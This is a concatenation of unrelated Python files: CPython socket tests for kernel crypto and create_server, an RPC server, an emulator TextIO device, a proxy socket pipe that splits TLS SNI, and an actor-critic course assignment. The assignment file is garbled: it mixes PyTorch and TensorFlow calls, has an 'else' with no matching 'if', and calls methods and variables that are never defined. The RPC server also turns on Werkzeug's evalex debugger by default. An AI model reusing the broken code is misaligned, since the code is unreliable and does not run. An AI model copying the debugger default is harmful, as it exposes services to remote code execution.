op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = support.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if support.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if support.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
self.assertEqual(sock.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = 3
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = support.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = support.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = support.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(BasicBluetoothTest)
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
server.py
|
#
# author: Cosmin Basca
#
# Copyright 2010 University of Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from abc import ABCMeta, abstractmethod, abstractproperty
from collections import OrderedDict
from threading import Thread
from time import sleep
from cherrypy import engine
from tornado.netutil import bind_sockets
from cherrypy.wsgiserver import CherryPyWSGIServer
from tornado.wsgi import WSGIContainer
from tornado.httpserver import HTTPServer
from tornado import ioloop
from asyncrpc.wsgi import RpcRegistryMiddleware, RpcRegistryViewer, ping_middleware, RpcInstanceMiddleware, \
info_middleware
from asyncrpc.registry import Registry
from asyncrpc.log import debug, warn, info, error
from werkzeug.wsgi import DispatcherMiddleware
from werkzeug.debug import DebuggedApplication
from requests import get, post, RequestException
# ----------------------------------------------------------------------------------------------------------------------
#
# Base RPC Server
#
# ----------------------------------------------------------------------------------------------------------------------
class RpcServer(object):
__metaclass__ = ABCMeta
def __init__(self, address, *args, **kwargs):
if isinstance(address, (tuple, list)):
host, port = address
elif isinstance(address, (str, unicode)):
host, port = address.split(':')
port = int(port)
else:
raise ValueError('address, must be either a tuple/list or string of the name:port form')
self._address = (host, port)
@property
def port(self):
return self._address[1]
@property
def host(self):
return self._address[0]
@property
def address(self):
return self._address
@abstractmethod
def stop(self):
pass
@abstractproperty
def bound_address(self):
pass
@abstractmethod
def server_forever(self, *args, **kwargs):
pass
def start(self, *args, **kwargs):
self.server_forever(*args, **kwargs)
def server_is_online(address, method='get', log_error=True):
if isinstance(address, (tuple, list)):
host, port = address
elif isinstance(address, (str, unicode)):
host, port = address.split(':')
port = int(port)
else:
raise ValueError('address, must be either a tuple/list or string of the name:port form')
_http = get if method == 'get' else post
try:
response = _http('http://{0}:{1}/ping'.format(host, port))
if response.status_code == 200:
return response.content.strip().lower() == 'pong'
return False
except RequestException as ex:
if log_error:
error('got an exception while checking if server is online: %s', ex)
return False
def wait_for_server(address, method='get', check_every=0.5, timeout=None, to_start=True):
def _test():
return server_is_online(address, method=method, log_error=False) == to_start
def _wait():
while True:
sleep(check_every)
# noinspection PyBroadException
try:
if _test():
break
except Exception:
pass
stopper = Thread(target=_wait)
stopper.daemon = True
stopper.start()
stopper.join(timeout=timeout)
# ----------------------------------------------------------------------------------------------------------------------
#
# Wsgi RPC server setup
#
# ----------------------------------------------------------------------------------------------------------------------
class WsgiRpcServer(RpcServer):
__metaclass__ = ABCMeta
def __init__(self, address, model, debug=True, theme=None, *args, **kwargs):
super(WsgiRpcServer, self).__init__(address, *args, **kwargs)
if isinstance(model, (dict, OrderedDict)):
types_registry = model
self._model = Registry()
registry_app = RpcRegistryMiddleware(types_registry, self._model)
registry_viewer = RpcRegistryViewer(types_registry, self._model, with_static=True, theme=theme)
if debug:
registry_viewer = DebuggedApplication(registry_viewer, evalex=True)
wsgi_app = DispatcherMiddleware(registry_viewer, {
'/rpc': registry_app,
'/ping': ping_middleware,
})
else:
self._model = model
instance_app = RpcInstanceMiddleware(self._model)
if debug:
instance_app = DebuggedApplication(instance_app, evalex=True)
wsgi_app = DispatcherMiddleware(info_middleware, {
'/rpc': instance_app,
'/ping': ping_middleware,
})
self._init_wsgi_server(self.address, wsgi_app, *args, **kwargs)
@abstractmethod
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
pass
def stop(self):
if hasattr(self._model, 'clear'):
self._model.clear()
# ----------------------------------------------------------------------------------------------------------------------
#
# Cherrypy RPC implementation
#
# ----------------------------------------------------------------------------------------------------------------------
class CherrypyWsgiRpcServer(WsgiRpcServer):
def __init__(self, address, model, *args, **kwargs):
super(CherrypyWsgiRpcServer, self).__init__(address, model, *args, **kwargs)
self._bound_address = None
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
self._server = CherryPyWSGIServer(address, wsgi_app)
def stop(self):
super(CherrypyWsgiRpcServer, self).stop()
self._server.stop()
# engine.stop()
engine.exit()
def server_forever(self, *args, **kwargs):
info('starting cherrypy server with a minimum of %s threads and %s max threads',
self._server.numthreads, self._server.maxthreads if self._server.maxthreads else 'no')
try:
self._server.start()
except Exception, e:
error("exception in serve_forever: %s", e)
finally:
info('closing the server ...')
self.stop()
info('server shutdown complete')
@property
def bound_address(self):
if not self._bound_address:
sock = getattr(self._server, 'socket', None)
if sock:
self._bound_address = sock.getsockname()
else:
return self._address
return self._bound_address
# ----------------------------------------------------------------------------------------------------------------------
#
# Tornado RPC implementation
#
# ----------------------------------------------------------------------------------------------------------------------
def shutdown_tornado(loop, server):
if server:
server.stop()
loop.stop()
class TornadoWsgiRpcServer(WsgiRpcServer):
def _init_wsgi_server(self, address, wsgi_app, *args, **kwargs):
self._server = HTTPServer(WSGIContainer(wsgi_app))
self._sockets = bind_sockets(address[1], address=address[0])
self._server.add_sockets(self._sockets)
self._bound_address = self._sockets[0].getsockname() # get the bound address of the first socket ...
def stop(self):
super(TornadoWsgiRpcServer, self).stop()
loop = ioloop.IOLoop.instance()
loop.add_callback(shutdown_tornado, loop, self._server)
def server_forever(self, *args, **kwargs):
info('starting tornado server in single-process mode')
try:
ioloop.IOLoop.instance().start()
except Exception, e:
error("exception in serve_forever: %s", e)
finally:
info('closing the server ...')
self.stop()
info('server shutdown complete')
@property
def bound_address(self):
return self._bound_address
|
TextIO.py
|
from .IOModule import IOModule
from ..priv.Exceptions import InstructionAccessFault
from ..helpers import int_from_bytes
from threading import Thread
import time
def _window_loop(textIO: 'TextIO'):
try:
import PySimpleGUI as sg
logs = sg.Text(font="monospace")
col = sg.Column([[logs]], size=(640, 400), scrollable=True)
window = sg.Window("TextIO:{:x}".format(textIO.addr), [[col]])
lines = list()
window.finalize()
textIO.set_sg_window(window)
while True:
e, v = window.read()
if e == sg.WINDOW_CLOSED:
window.close()
textIO.set_sg_window(None)
break
if e == 'putlog':
lines.insert(0, v[0])
logs.update(value='\n'.join(lines) + '\n')
col.contents_changed()
except ImportError:
print("[TextIO] window disabled - please install PySimpleGui!")
textIO.set_sg_window(None)
class TextIO(IOModule):
def __init__(self, addr: int, buflen: int = 128):
super(TextIO, self).__init__(addr, buflen + 4)
self.buff = bytearray(buflen)
self.current_line = ""
self.sg_window = None
self.start_buffer = list()
self.thread = Thread(target=_window_loop, args=(self,))
self.thread.start()
time.sleep(0.1)
def set_sg_window(self, window):
if self.sg_window is not None and window is not None:
raise Exception("cannot set window twice!")
self.sg_window = window
buff = self.start_buffer
self.start_buffer = None if window is None else list()
for line in buff:
self._present(line)
def read(self, addr: int, size: int) -> bytearray:
raise InstructionAccessFault(addr)
def write(self, addr: int, data: bytearray, size: int):
if addr == self.addr:
if size > 4:
raise InstructionAccessFault(addr)
if int_from_bytes(data[0:4]) > 0:
self._print()
return
buff_start = addr - self.addr - 4
self.buff[buff_start:buff_start + size] = data[0:size]
def _print(self):
buff = self.buff
self.buff = bytearray(self.size)
if b'\x00' in buff:
buff = buff.split(b'\x00')[0]
text = buff.decode('ascii')
if '\n' in text:
lines = text.split("\n")
lines[0] = self.current_line + lines[0]
for line in lines[:-1]:
self._present(line)
self.current_line = lines[-1]
else:
self.current_line += text
def _present(self, text: str):
if self.sg_window is not None:
self.sg_window.write_event_value('putlog', text)
elif self.start_buffer is not None:
self.start_buffer.append(text)
else:
print("[TextIO:{:x}] {}".format(self.addr, text))
|
pipe_socks.py
|
import threading
import select
import time
import ssl
import socket
import utils
import global_var as g
from xlog import getLogger
xlog = getLogger("smart_router")
class PipeSocks(object):
def __init__(self, buf_size=16*1024):
self.buf_size = buf_size
self.sock_dict = {}
self.read_set = []
self.write_set = []
self.error_set = []
self.running = True
def __str__(self):
outs = ["Pipe Sockets:"]
outs.append("buf_size=%d" % self.buf_size)
outs.append("running=%d" % self.running)
outs.append("")
outs.append("socket dict:")
for s in self.sock_dict:
outs.append(" %s =%s" % (s, self.sock_dict[s]))
outs.append("read dict:")
for s in self.read_set:
outs.append(" %s" % s)
outs.append("write dict:")
for s in self.write_set:
outs.append(" %s" % s)
outs.append("error dict:")
for s in self.error_set:
outs.append(" %s" % s)
return "\n".join(outs)
def run(self):
self.down_th = threading.Thread(target=self.pipe)
self.down_th.start()
def stop(self):
self.running = False
def add_socks(self, s1, s2):
for s in [s1, s2]:
if isinstance(s._sock, socket._closedsocket) or \
(isinstance(s._sock, ssl.SSLSocket) and
isinstance(s._sock._sock, socket._closedsocket)):
xlog.warn("try to add_socks closed socket:%s %s", s1, s2)
s1.close()
s2.close()
return
s1.setblocking(0)
s2.setblocking(0)
self.read_set.append(s1)
self.read_set.append(s2)
self.error_set.append(s1)
self.error_set.append(s2)
self.sock_dict[s1] = s2
self.sock_dict[s2] = s1
def try_remove(self, l, s):
try:
l.remove(s)
except:
pass
def close(self, s1, e):
if s1 not in self.sock_dict:
# xlog.warn("sock not in dict")
return
s2 = self.sock_dict[s1]
if utils.is_private_ip(s1.ip):
local_sock = s1
remote_sock = s2
else:
local_sock = s2
remote_sock = s1
create_time = time.time() - remote_sock.create_time
xlog.debug("pipe close %s->%s run_time:%d upload:%d,%d download:%d,%d, by remote:%d, left:%d e:%r",
local_sock, remote_sock, create_time,
local_sock.recved_data, local_sock.recved_times,
remote_sock.recved_data, remote_sock.recved_times,
s1==remote_sock, s1.buf_size, e)
if local_sock.recved_data > 0 and local_sock.recved_times == 1 and remote_sock.port == 443 and \
((s1 == local_sock and create_time > 30) or (s1 == remote_sock)):
host = remote_sock.host
xlog.debug("SNI:%s fail.", host)
#g.domain_cache.update_rule(host, 443, "gae")
del self.sock_dict[s1]
self.try_remove(self.read_set, s1)
self.try_remove(self.write_set, s1)
self.try_remove(self.error_set, s1)
s1.close()
if s2.buf_size:
xlog.debug("pipe close %s e:%s, but s2:%s have data(%d) to send",
s1, e, s2, s2.buf_size)
s2.add_dat("")
return
if s2 in self.sock_dict:
del self.sock_dict[s2]
self.try_remove(self.read_set, s2)
self.try_remove(self.write_set, s2)
self.try_remove(self.error_set, s2)
s2.close()
def pipe(self):
def flush_send_s(s2, d1):
s2.setblocking(1)
s2.settimeout(1)
s2.sendall(d1)
s2.setblocking(0)
while self.running:
if not self.error_set:
time.sleep(0.1)
continue
for s1 in self.error_set:
s2 = self.sock_dict[s1]
if s2 not in self.sock_dict and \
s1 not in self.read_set and s1 not in self.write_set:
self.close(s1, "miss")
try:
r, w, e = select.select(self.read_set, self.write_set, self.error_set, 0.1)
for s1 in list(r):
if s1 not in self.read_set:
continue
try:
d = s1.recv(65535)
except Exception as e:
self.close(s1, "r")
continue
if not d:
# socket closed by peer.
self.close(s1, "r")
continue
s1.recved_data += len(d)
s1.recved_times += 1
s2 = self.sock_dict[s1]
if s2.is_closed():
continue
if g.config.direct_split_SNI and\
s1.recved_times == 1 and \
s2.port == 443 and \
d[0] == '\x16' and \
g.gfwlist.check(s2.host):
p1 = d.find(s2.host)
if p1 > 1:
if "google" in s2.host:
p2 = d.find("google") + 3
else:
p2 = p1 + len(s2.host) - 6
d1 = d[:p2]
d2 = d[p2:]
try:
flush_send_s(s2, d1)
except Exception as e:
xlog.warn("send split SNI:%s fail:%r", s2.host, e)
self.close(s2, "w")
continue
s2.add_dat(d2)
d = ""
xlog.debug("pipe send split SNI:%s", s2.host)
if s2.buf_size == 0:
try:
sended = s2.send(d)
# xlog.debug("direct send %d to %s from:%s", sended, s2, s1)
except Exception as e:
self.close(s2, "w")
continue
if sended == len(d):
continue
else:
d_view = memoryview(d)
d = d_view[sended:]
if d:
if not isinstance(d, memoryview):
d = memoryview(d)
s2.add_dat(d)
if s2 not in self.write_set:
self.write_set.append(s2)
if s2.buf_size > self.buf_size:
self.try_remove(self.read_set, s1)
for s1 in list(w):
if s1 not in self.write_set:
continue
if s1.buf_num == 0:
self.try_remove(self.write_set, s1)
continue
while s1.buf_num:
dat = s1.get_dat()
if not dat:
self.close(s1, "n")
break
try:
sended = s1.send(dat)
except Exception as e:
self.close(s1, "w")
break
if len(dat) - sended > 0:
s1.restore_dat(dat[sended:])
break
if s1.buf_size < self.buf_size:
if s1 not in self.sock_dict:
continue
s2 = self.sock_dict[s1]
if s2 not in self.read_set and s2 in self.sock_dict:
self.read_set.append(s2)
elif s1.buf_size == 0 and s2.is_closed():
self.close(s1, "n")
for s1 in list(e):
self.close(s1, "e")
except Exception as e:
xlog.exception("pipe except:%r", e)
for s in list(self.error_set):
if isinstance(s._sock, socket._closedsocket) or \
(isinstance(s._sock, ssl.SSLSocket) and
isinstance(s._sock._sock, socket._closedsocket)):
xlog.warn("socket %s is closed", s)
self.close(s, "e")
for s in list(self.error_set):
self.close(s, "stop")
xlog.info("pipe stopped.")
|
train_ac_exploration_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Soroush Nasiriany, Sid Reddy, and Greg Kahn
Adapted for CS294-112 Fall 2018 with <3 by Michael Chang, some experiments by Greg Kahn, beta-tested by Sid Reddy
"""
import numpy as np
import torch
import torch.nn as nn
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
from exploration import ExemplarExploration, DiscreteExploration, RBFExploration
from density_model import Exemplar, Histogram, RBF
from utils.pytorch_utils import *
#============================================================================================#
# Utilities
#============================================================================================#
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_AC)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Actor Critic
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_advantage_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.num_target_updates = computation_graph_args['num_target_updates']
self.num_grad_steps_per_target_update = computation_graph_args['num_grad_steps_per_target_update']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_advantage_args['gamma']
self.normalize_advantages = estimate_advantage_args['normalize_advantages']
self.device = computation_graph_args['device']
self._build_graph()
def _build_graph(self):
self._build_actor()
self._build_critic()
##################### Building Actor #######################
def _policy_forward_pass(self):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
sy_probs_na = MLP(self.ob_dim, output_size=self.ac_dim, n_layers=self.n_layers, size=self.size, output_activation=nn.Softmax(dim=1))
self.policy_parameters = sy_probs_na.to(self.device)
else:
sy_mean = MLP(self.ob_dim, output_size=self.ac_dim, n_layers=self.n_layers, size=self.size)
sy_logstd = torch.zeros(self.ac_dim, requires_grad=True)
self.policy_parameters = (sy_mean.to(self.device), sy_logstd.to(self.device))
def _define_actor_train_op(self):
if self.discrete:
probs = self.policy_parameters
self.actor_optimizer = torch.optim.Adam(probs.parameters(), lr=self.learning_rate)
else:
mean, logstd = self.policy_parameters
self.actor_optimizer = torch.optim.Adam([logstd] + list(mean.parameters()), lr=self.learning_rate)
self.mse_criterion = torch.nn.MSELoss(reduction='mean')
def _build_actor(self):
# defining forward pass of the policy
self.policy_forward_pass()
# define operation that are needed for backpropagation
self._define_actor_train_op()
def _define_log_prob(self, observation, action):
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, 'discrete_logits', n_layers=self.n_layers, size=self.size)
return sy_logits_na
else:
sy_mean = build_mlp(sy_ob_no, self.ac_dim, 'continuous_logits', n_layers=self.n_layers, size=self.size)
sy_logstd = tf.Variable(tf.zeros(self.ac_dim), name='sy_logstd')
return (sy_mean, sy_logstd)
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, num_samples=1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
sy_sampled_ac = sy_mean + tf.exp(sy_logstd) * tf.random_normal(tf.shape(sy_mean), 0, 1)
return sy_sampled_ac
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_probs_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
#log probability under a categorical distribution
sy_probs_na = self.policy_parameters
sy_logprob_n = torch.distributions.Categorical(probs=sy_probs_na(observation)).log_prob(action)
else:
#log probability under a multivariate gaussian
sy_mean, sy_logstd = self.policy_parameters
sy_logprob_n = multivariate_normal_diag(
loc=sy_mean(observation), scale_diag=torch.exp(sy_logstd)).log_prob(action)
return sy_logprob_n
